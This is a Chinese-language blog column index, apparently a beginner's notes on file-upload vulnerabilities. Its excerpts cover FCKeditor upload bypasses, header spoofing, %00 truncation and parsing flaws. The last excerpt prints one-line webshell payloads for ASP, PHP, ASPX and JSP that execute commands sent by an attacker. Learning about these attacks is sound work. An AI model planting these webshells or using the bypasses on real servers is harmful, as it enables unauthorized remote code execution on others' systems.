上传漏洞
有上传就有漏洞
mon0dy
小白一个,刚开始学习,有不对的地方还请大佬指点
展开
-
fckeditor编辑器漏洞
查看fckeditor编辑器版本 /_whatsnew.html/editor/dialog/fck_about.html查出版本信息之后就可以到网上搜相应的漏洞version2.2Apache+linux 环境下在上传文件后面加个.突破version<=2.4.2 For php该版本在处理PHP上传的地方没有对Media类型进行上传文件类型的控制,导致用户上传任意...原创 2020-04-07 21:20:58 · 3352 阅读 · 0 评论 -
常见的文件上传漏洞
文章目录文件头欺骗漏洞filepath漏洞%00截断filetype漏洞提交表单文件头欺骗漏洞在一句话木马所在文件的开始部位加上GIF89a,然后保存为图片格式,可以突破简单的WAF,如图所示,有的还会检测文件大小,所以太小也不行,加入适当代码,让他达到一个正常的图片的大小。filepath漏洞可用来突破自动命名规则。自动命名规则,就是会把你上传的文件的名字按照他的一套规则进行修改...原创 2020-04-06 21:39:51 · 906 阅读 · 0 评论 -
上传漏洞之解析漏洞
文件解析漏洞原创 2020-04-04 10:03:53 · 288 阅读 · 1 评论 -
上传漏洞之简单的木马用法(含WAF)
一句话木马asp:<%eval request("heroes")%>php:<?php @eval($_POST[12345]);?>aspx:<%@ Page Language="Jscript"%><%eval(Request.Item["12345"],"unsafe");%>jsp:<% if(request.getParam...原创 2020-04-03 18:16:54 · 1123 阅读 · 1 评论